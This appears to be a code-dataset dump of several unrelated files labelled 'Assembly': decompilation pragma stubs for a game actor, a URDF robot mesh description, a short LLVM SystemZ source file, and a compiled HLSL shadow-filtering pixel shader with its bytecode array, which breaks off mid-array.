#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7C44.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7D48.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7DC8.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7E90.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7F44.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF803C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF80E4.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8224.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF828C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF82F0.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF832C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8368.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8388.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF83D4.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Update.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF8828.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Draw.s")
| {
"language": "Assembly"
} |
<robot name="blob523">
<link name="random_obj_523">
<contact>
<lateral_friction value="1.0"/>
<rolling_friction value="0.0"/>
<inertia_scaling value="3.0"/>
<contact_cfm value="0.0"/>
<contact_erp value="1.0"/>
</contact>
<inertial>
<origin rpy="0 0 0" xyz="0 0 0"/>
<mass value="0.1"/>
<inertia ixx="1" ixy="0" ixz="0" iyy="1" iyz="0" izz="0"/>
</inertial>
<visual>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="523.obj" scale="0.015 0.015 0.015"/>
</geometry>
<material name="blockmat">
<color rgba="0.26 0.01 0.06 1"/>
</material>
</visual>
<collision>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="523.obj" scale="0.015 0.015 0.015"/>
</geometry>
</collision>
</link>
</robot>
| {
"language": "Assembly"
} |
//=== SystemZMachineFunctionInfo.cpp - SystemZ machine function info ------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//

#include "SystemZMachineFunctionInfo.h"

using namespace llvm;

// pin vtable to this file: defining one out-of-line virtual method here
// anchors the class's vtable to this translation unit, so the compiler
// does not emit a weak copy in every TU that includes the header.
void SystemZMachineFunctionInfo::anchor() {}
| {
"language": "Assembly"
} |
#if 0
//
// Generated by Microsoft (R) HLSL Shader Compiler 10.0.10011.16384
//
//
// Buffer Definitions:
//
// cbuffer CB_SHADOWS_DATA
// {
//
// struct ShadowsData
// {
//
// struct Camera
// {
//
// float4x4 m_View; // Offset: 0
// float4x4 m_Projection; // Offset: 64
// float4x4 m_ViewProjection; // Offset: 128
// float4x4 m_View_Inv; // Offset: 192
// float4x4 m_Projection_Inv; // Offset: 256
// float4x4 m_ViewProjection_Inv;// Offset: 320
// float3 m_Position; // Offset: 384
// float m_Fov; // Offset: 396
// float3 m_Direction; // Offset: 400
// float m_FarPlane; // Offset: 412
// float3 m_Right; // Offset: 416
// float m_NearPlane; // Offset: 428
// float3 m_Up; // Offset: 432
// float m_Aspect; // Offset: 444
// float4 m_Color; // Offset: 448
//
// } m_Viewer; // Offset: 0
// float2 m_Size; // Offset: 464
// float2 m_SizeInv; // Offset: 472
//
// struct ShadowsLightData
// {
//
// struct Camera
// {
//
// float4x4 m_View; // Offset: 480
// float4x4 m_Projection; // Offset: 544
// float4x4 m_ViewProjection;// Offset: 608
// float4x4 m_View_Inv; // Offset: 672
// float4x4 m_Projection_Inv;// Offset: 736
// float4x4 m_ViewProjection_Inv;// Offset: 800
// float3 m_Position; // Offset: 864
// float m_Fov; // Offset: 876
// float3 m_Direction; // Offset: 880
// float m_FarPlane; // Offset: 892
// float3 m_Right; // Offset: 896
// float m_NearPlane; // Offset: 908
// float3 m_Up; // Offset: 912
// float m_Aspect; // Offset: 924
// float4 m_Color; // Offset: 928
//
// } m_Camera; // Offset: 480
// float2 m_Size; // Offset: 944
// float2 m_SizeInv; // Offset: 952
// float4 m_Region; // Offset: 960
// float4 m_Weight; // Offset: 976
// float m_SunArea; // Offset: 992
// float m_DepthTestOffset; // Offset: 996
// float m_NormalOffsetScale; // Offset: 1000
// uint m_ArraySlice; // Offset: 1004
//
// } m_Light[6]; // Offset: 480
// uint m_ActiveLightCount; // Offset: 3648
// float3 pad3; // Offset: 3652
//
// } g_cbShadowsData; // Offset: 0 Size: 3664
//
// }
//
//
// Resource Bindings:
//
// Name Type Format Dim HLSL Bind Count
// ------------------------------ ---------- ------- ----------- -------------- ------
// g_scsLinear sampler_c NA NA s3 1
// g_t2dDepth texture float 2d t0 1
// g_t2dShadow texture float 2d t2 1
// CB_SHADOWS_DATA cbuffer NA NA cb0 1
//
//
//
// Input signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_POSITION 0 xyzw 0 POS float xy
// TEXCOORD 0 xy 1 NONE float
//
//
// Output signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// SV_Target 0 xyzw 0 TARGET float xyzw
//
ps_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer CB0[229], dynamicIndexed
dcl_sampler s3, mode_comparison
dcl_resource_texture2d (float,float,float,float) t0
dcl_resource_texture2d (float,float,float,float) t2
dcl_input_ps_siv linear noperspective v0.xy, position
dcl_output o0.xyzw
dcl_temps 6
mul r0.x, v0.x, cb0[29].z
mul r0.y, v0.y, -cb0[29].w
add r0.xy, r0.xyxx, l(-0.500000, 0.500000, 0.000000, 0.000000)
add r0.xy, r0.xyxx, r0.xyxx
ftoi r1.xy, v0.xyxx
mov r1.zw, l(0,0,0,0)
ld_indexable(texture2d)(float,float,float,float) r0.z, r1.xyzw, t0.yzxw
mov r0.w, l(1.000000)
dp4 r1.x, r0.xyzw, cb0[20].xyzw
dp4 r1.y, r0.xyzw, cb0[21].xyzw
dp4 r1.z, r0.xyzw, cb0[22].xyzw
dp4 r1.w, r0.xyzw, cb0[23].xyzw
div r0.xyzw, r1.xyzw, r1.wwww
mov r1.w, r0.w
mov r1.xyz, r0.xyzx
mov r0.w, l(-1)
mov r2.xy, l(0,1.000000,0,0)
loop
ult r2.z, r2.x, cb0[228].x
and r2.z, r0.w, r2.z
breakc_z r2.z
imul null, r2.z, r2.x, l(33)
dp4 r3.x, r1.xyzw, cb0[r2.z + 38].xyzw
dp4 r3.y, r1.xyzw, cb0[r2.z + 39].xyzw
dp4 r3.z, r1.xyzw, cb0[r2.z + 40].xyzw
dp4 r2.w, r1.xyzw, cb0[r2.z + 41].xyzw
div r3.xyz, r3.xyzx, r2.wwww
mad r4.xy, r3.xyxx, l(0.500000, 0.500000, 0.000000, 0.000000), l(0.500000, 0.500000, 0.000000, 0.000000)
add r2.w, -r4.y, l(1.000000)
ge r3.x, r4.x, l(0.000000)
ge r3.y, l(1.000000), r4.x
and r3.x, r3.y, r3.x
ge r3.y, r2.w, l(0.000000)
and r3.x, r3.y, r3.x
ge r2.w, l(1.000000), r2.w
and r2.w, r2.w, r3.x
ge r3.x, r3.z, l(0.000000)
and r2.w, r2.w, r3.x
ge r3.x, l(1.000000), r3.z
and r2.w, r2.w, r3.x
if_nz r2.w
add r3.xy, -cb0[r2.z + 60].xyxx, cb0[r2.z + 60].zwzz
add r4.z, -r4.y, l(1.000000)
mad r4.xy, r4.xzxx, r3.xyxx, cb0[r2.z + 60].xyxx
add r2.w, r3.z, -cb0[r2.z + 62].y
mul r3.xy, r3.xyxx, cb0[r2.z + 59].zwzz
mad r5.xyzw, r3.xyxy, l(1.587556, 4.796667, 0.435970, 3.288376), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r2.z, r5.xyxx, t2.xxxx, s3, r2.w
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mul r3.z, r3.z, l(0.736643)
mad r2.z, r2.z, l(0.492077), r3.z
mad r5.xyzw, r3.xyxy, l(-0.864387, 4.575846, 3.292378, 5.138325), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.547509), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.355403), r2.z
mad r5.xyzw, r3.xyxy, l(2.312524, 2.769281, 4.225343, 3.604556), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.696579), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.424500), r2.z
mad r5.xyzw, r3.xyxy, l(0.502956, 6.027727, 0.550159, 1.327755), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.361935), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.944237), r2.z
mad r5.xyzw, r3.xyxy, l(3.755680, 0.434709, 4.400129, 1.975965), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.672295), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.523999), r2.z
mad r5.xyzw, r3.xyxy, l(5.723944, 3.047444, -2.986023, 3.579002), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.310967), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.546900), r2.z
mad r5.xyzw, r3.xyxy, l(-2.205332, 5.931354, -2.094388, 1.725067), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.328787), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.815048), r2.z
mad r5.xyzw, r3.xyxy, l(1.600374, -0.851189, -1.565537, -0.936008), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.912771), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.911725), r2.z
mad r5.xyzw, r3.xyxy, l(-0.062289, -0.300187, -3.644919, -0.090210), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.997393), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.691242), r2.z
mad r5.xyzw, r3.xyxy, l(-4.533929, 2.319456, -5.902076, -0.327370), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.486531), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.378855), r2.z
mad r5.xyzw, r3.xyxy, l(-4.387158, -1.592991, -1.661510, -2.520221), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.546002), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.776379), r2.z
mad r5.xyzw, r3.xyxy, l(-6.255653, 1.339290, 0.047479, -1.925659), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.320825), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.902066), r2.z
mad r5.xyzw, r3.xyxy, l(2.232487, -2.384052, -4.229948, -3.533641), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.743546), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.430046), r2.z
mad r5.xyzw, r3.xyxy, l(-5.739054, -2.659190, -1.075142, -4.961121), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.329120), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.488803), r2.z
mad r5.xyzw, r3.xyxy, l(-3.235412, -5.090914, 5.271102, -2.455229), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.363963), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.390925), r2.z
mad r5.xyzw, r3.xyxy, l(1.848549, -4.045560, 4.485181, -1.039879), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.577211), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.554971), r2.z
mad r5.xyzw, r3.xyxy, l(-0.072291, -3.524127, 1.539461, -6.215834), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.708128), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.320116), r2.z
mad r5.xyzw, r3.xyxy, l(-0.425475, -6.440681, 4.227208, -4.779742), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.314328), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.322717), r2.z
mad r5.xyzw, r3.xyxy, l(6.360718, -0.269859, 3.497874, -3.338060), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.324368), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.522368), r2.z
mad r5.xyzw, r3.xyxy, l(-4.590532, 3.906749, 2.116800, 1.092689), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.364465), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.854163), r2.z
mad r3.xy, r3.xyxx, l(6.069216, 1.384925, 0.000000, 0.000000), r4.xyxx
sample_c_lz_indexable(texture2d)(float,float,float,float) r2.w, r3.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r2.w, l(0.340792), r2.z
mul r2.z, r2.z, l(0.044188)
mov r0.w, l(0)
else
mov r2.z, l(1.000000)
endif
min r2.y, r2.z, r2.y
iadd r2.x, r2.x, l(1)
endloop
mov o0.xyzw, r2.yyyy
ret
// Approximately 159 instruction slots used
#endif
const BYTE PS_SF_T2D_CASCADE_UNIFORM_TEX_FETCH_PCF_TAP_TYPE_POISSON_NORMAL_OPTION_NONE_FILTER_SIZE_13_Data[] =
{
68, 88, 66, 67, 177, 90,
5, 149, 10, 64, 250, 34,
15, 30, 153, 75, 190, 194,
112, 249, 1, 0, 0, 0,
180, 31, 0, 0, 5, 0,
0, 0, 52, 0, 0, 0,
236, 5, 0, 0, 68, 6,
0, 0, 120, 6, 0, 0,
24, 31, 0, 0, 82, 68,
69, 70, 176, 5, 0, 0,
1, 0, 0, 0, 240, 0,
0, 0, 4, 0, 0, 0,
60, 0, 0, 0, 0, 5,
255, 255, 0, 1, 0, 0,
124, 5, 0, 0, 82, 68,
49, 49, 60, 0, 0, 0,
24, 0, 0, 0, 32, 0,
0, 0, 40, 0, 0, 0,
36, 0, 0, 0, 12, 0,
0, 0, 0, 0, 0, 0,
188, 0, 0, 0, 3, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 3, 0, 0, 0,
1, 0, 0, 0, 3, 0,
0, 0, 200, 0, 0, 0,
2, 0, 0, 0, 5, 0,
0, 0, 4, 0, 0, 0,
255, 255, 255, 255, 0, 0,
0, 0, 1, 0, 0, 0,
1, 0, 0, 0, 211, 0,
0, 0, 2, 0, 0, 0,
5, 0, 0, 0, 4, 0,
0, 0, 255, 255, 255, 255,
2, 0, 0, 0, 1, 0,
0, 0, 1, 0, 0, 0,
223, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
1, 0, 0, 0, 1, 0,
0, 0, 103, 95, 115, 99,
115, 76, 105, 110, 101, 97,
114, 0, 103, 95, 116, 50,
100, 68, 101, 112, 116, 104,
0, 103, 95, 116, 50, 100,
83, 104, 97, 100, 111, 119,
0, 67, 66, 95, 83, 72,
65, 68, 79, 87, 83, 95,
68, 65, 84, 65, 0, 171,
223, 0, 0, 0, 1, 0,
0, 0, 8, 1, 0, 0,
80, 14, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
48, 1, 0, 0, 0, 0,
0, 0, 80, 14, 0, 0,
2, 0, 0, 0, 88, 5,
0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0,
0, 0, 255, 255, 255, 255,
0, 0, 0, 0, 103, 95,
99, 98, 83, 104, 97, 100,
111, 119, 115, 68, 97, 116,
97, 0, 83, 104, 97, 100,
111, 119, 115, 68, 97, 116,
97, 0, 109, 95, 86, 105,
101, 119, 101, 114, 0, 67,
97, 109, 101, 114, 97, 0,
109, 95, 86, 105, 101, 119,
0, 102, 108, 111, 97, 116,
52, 120, 52, 0, 3, 0,
3, 0, 4, 0, 4, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
99, 1, 0, 0, 109, 95,
80, 114, 111, 106, 101, 99,
116, 105, 111, 110, 0, 109,
95, 86, 105, 101, 119, 80,
114, 111, 106, 101, 99, 116,
105, 111, 110, 0, 109, 95,
86, 105, 101, 119, 95, 73,
110, 118, 0, 109, 95, 80,
114, 111, 106, 101, 99, 116,
105, 111, 110, 95, 73, 110,
118, 0, 109, 95, 86, 105,
101, 119, 80, 114, 111, 106,
101, 99, 116, 105, 111, 110,
95, 73, 110, 118, 0, 109,
95, 80, 111, 115, 105, 116,
105, 111, 110, 0, 102, 108,
111, 97, 116, 51, 0, 171,
171, 171, 1, 0, 3, 0,
1, 0, 3, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 234, 1,
0, 0, 109, 95, 70, 111,
118, 0, 102, 108, 111, 97,
116, 0, 0, 0, 3, 0,
1, 0, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 30, 2,
0, 0, 109, 95, 68, 105,
114, 101, 99, 116, 105, 111,
110, 0, 109, 95, 70, 97,
114, 80, 108, 97, 110, 101,
0, 109, 95, 82, 105, 103,
104, 116, 0, 109, 95, 78,
101, 97, 114, 80, 108, 97,
110, 101, 0, 109, 95, 85,
112, 0, 109, 95, 65, 115,
112, 101, 99, 116, 0, 109,
95, 67, 111, 108, 111, 114,
0, 102, 108, 111, 97, 116,
52, 0, 1, 0, 3, 0,
1, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 137, 2,
0, 0, 92, 1, 0, 0,
108, 1, 0, 0, 0, 0,
0, 0, 144, 1, 0, 0,
108, 1, 0, 0, 64, 0,
0, 0, 157, 1, 0, 0,
108, 1, 0, 0, 128, 0,
0, 0, 174, 1, 0, 0,
108, 1, 0, 0, 192, 0,
0, 0, 185, 1, 0, 0,
108, 1, 0, 0, 0, 1,
0, 0, 202, 1, 0, 0,
108, 1, 0, 0, 64, 1,
0, 0, 223, 1, 0, 0,
244, 1, 0, 0, 128, 1,
0, 0, 24, 2, 0, 0,
36, 2, 0, 0, 140, 1,
0, 0, 72, 2, 0, 0,
244, 1, 0, 0, 144, 1,
0, 0, 84, 2, 0, 0,
36, 2, 0, 0, 156, 1,
0, 0, 95, 2, 0, 0,
244, 1, 0, 0, 160, 1,
0, 0, 103, 2, 0, 0,
36, 2, 0, 0, 172, 1,
0, 0, 115, 2, 0, 0,
244, 1, 0, 0, 176, 1,
0, 0, 120, 2, 0, 0,
36, 2, 0, 0, 188, 1,
0, 0, 129, 2, 0, 0,
144, 2, 0, 0, 192, 1,
0, 0, 5, 0, 0, 0,
1, 0, 116, 0, 0, 0,
15, 0, 180, 2, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 85, 1,
0, 0, 109, 95, 83, 105,
122, 101, 0, 102, 108, 111,
97, 116, 50, 0, 171, 171,
1, 0, 3, 0, 1, 0,
2, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 147, 3, 0, 0,
109, 95, 83, 105, 122, 101,
73, 110, 118, 0, 109, 95,
76, 105, 103, 104, 116, 0,
83, 104, 97, 100, 111, 119,
115, 76, 105, 103, 104, 116,
68, 97, 116, 97, 0, 109,
95, 67, 97, 109, 101, 114,
97, 0, 109, 95, 82, 101,
103, 105, 111, 110, 0, 109,
95, 87, 101, 105, 103, 104,
116, 0, 109, 95, 83, 117,
110, 65, 114, 101, 97, 0,
109, 95, 68, 101, 112, 116,
104, 84, 101, 115, 116, 79,
102, 102, 115, 101, 116, 0,
109, 95, 78, 111, 114, 109,
97, 108, 79, 102, 102, 115,
101, 116, 83, 99, 97, 108,
101, 0, 109, 95, 65, 114,
114, 97, 121, 83, 108, 105,
99, 101, 0, 100, 119, 111,
114, 100, 0, 171, 171, 171,
0, 0, 19, 0, 1, 0,
1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 59, 4, 0, 0,
227, 3, 0, 0, 104, 3,
0, 0, 0, 0, 0, 0,
140, 3, 0, 0, 156, 3,
0, 0, 208, 1, 0, 0,
192, 3, 0, 0, 156, 3,
0, 0, 216, 1, 0, 0,
236, 3, 0, 0, 144, 2,
0, 0, 224, 1, 0, 0,
245, 3, 0, 0, 144, 2,
0, 0, 240, 1, 0, 0,
254, 3, 0, 0, 36, 2,
0, 0, 0, 2, 0, 0,
8, 4, 0, 0, 36, 2,
0, 0, 4, 2, 0, 0,
26, 4, 0, 0, 36, 2,
0, 0, 8, 2, 0, 0,
46, 4, 0, 0, 68, 4,
0, 0, 12, 2, 0, 0,
5, 0, 0, 0, 1, 0,
132, 0, 6, 0, 9, 0,
104, 4, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 210, 3, 0, 0,
109, 95, 65, 99, 116, 105,
118, 101, 76, 105, 103, 104,
116, 67, 111, 117, 110, 116,
0, 112, 97, 100, 51, 0,
76, 1, 0, 0, 104, 3,
0, 0, 0, 0, 0, 0,
140, 3, 0, 0, 156, 3,
0, 0, 208, 1, 0, 0,
192, 3, 0, 0, 156, 3,
0, 0, 216, 1, 0, 0,
202, 3, 0, 0, 212, 4,
0, 0, 224, 1, 0, 0,
248, 4, 0, 0, 68, 4,
0, 0, 64, 14, 0, 0,
11, 5, 0, 0, 244, 1,
0, 0, 68, 14, 0, 0,
5, 0, 0, 0, 1, 0,
148, 3, 0, 0, 6, 0,
16, 5, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 64, 1, 0, 0,
77, 105, 99, 114, 111, 115,
111, 102, 116, 32, 40, 82,
41, 32, 72, 76, 83, 76,
32, 83, 104, 97, 100, 101,
114, 32, 67, 111, 109, 112,
105, 108, 101, 114, 32, 49,
48, 46, 48, 46, 49, 48,
48, 49, 49, 46, 49, 54,
51, 56, 52, 0, 73, 83,
71, 78, 80, 0, 0, 0,
2, 0, 0, 0, 8, 0,
0, 0, 56, 0, 0, 0,
0, 0, 0, 0, 1, 0,
0, 0, 3, 0, 0, 0,
0, 0, 0, 0, 15, 3,
0, 0, 68, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 3, 0, 0, 0,
1, 0, 0, 0, 3, 0,
0, 0, 83, 86, 95, 80,
79, 83, 73, 84, 73, 79,
78, 0, 84, 69, 88, 67,
79, 79, 82, 68, 0, 171,
171, 171, 79, 83, 71, 78,
44, 0, 0, 0, 1, 0,
0, 0, 8, 0, 0, 0,
32, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
3, 0, 0, 0, 0, 0,
0, 0, 15, 0, 0, 0,
83, 86, 95, 84, 97, 114,
103, 101, 116, 0, 171, 171,
83, 72, 69, 88, 152, 24,
0, 0, 80, 0, 0, 0,
38, 6, 0, 0, 106, 8,
0, 1, 89, 8, 0, 4,
70, 142, 32, 0, 0, 0,
0, 0, 229, 0, 0, 0,
90, 8, 0, 3, 0, 96,
16, 0, 3, 0, 0, 0,
88, 24, 0, 4, 0, 112,
16, 0, 0, 0, 0, 0,
85, 85, 0, 0, 88, 24,
0, 4, 0, 112, 16, 0,
2, 0, 0, 0, 85, 85,
0, 0, 100, 32, 0, 4,
50, 16, 16, 0, 0, 0,
0, 0, 1, 0, 0, 0,
101, 0, 0, 3, 242, 32,
16, 0, 0, 0, 0, 0,
104, 0, 0, 2, 6, 0,
0, 0, 56, 0, 0, 8,
18, 0, 16, 0, 0, 0,
0, 0, 10, 16, 16, 0,
0, 0, 0, 0, 42, 128,
32, 0, 0, 0, 0, 0,
29, 0, 0, 0, 56, 0,
0, 9, 34, 0, 16, 0,
0, 0, 0, 0, 26, 16,
16, 0, 0, 0, 0, 0,
58, 128, 32, 128, 65, 0,
0, 0, 0, 0, 0, 0,
29, 0, 0, 0, 0, 0,
0, 10, 50, 0, 16, 0,
0, 0, 0, 0, 70, 0,
16, 0, 0, 0, 0, 0,
2, 64, 0, 0, 0, 0,
0, 191, 0, 0, 0, 63,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 7,
50, 0, 16, 0, 0, 0,
0, 0, 70, 0, 16, 0,
0, 0, 0, 0, 70, 0,
16, 0, 0, 0, 0, 0,
27, 0, 0, 5, 50, 0,
16, 0, 1, 0, 0, 0,
70, 16, 16, 0, 0, 0,
0, 0, 54, 0, 0, 8,
194, 0, 16, 0, 1, 0,
0, 0, 2, 64, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 45, 0,
0, 137, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 0, 0, 0, 0,
70, 14, 16, 0, 1, 0,
0, 0, 150, 124, 16, 0,
0, 0, 0, 0, 54, 0,
0, 5, 130, 0, 16, 0,
0, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
17, 0, 0, 8, 18, 0,
16, 0, 1, 0, 0, 0,
70, 14, 16, 0, 0, 0,
0, 0, 70, 142, 32, 0,
0, 0, 0, 0, 20, 0,
0, 0, 17, 0, 0, 8,
34, 0, 16, 0, 1, 0,
0, 0, 70, 14, 16, 0,
0, 0, 0, 0, 70, 142,
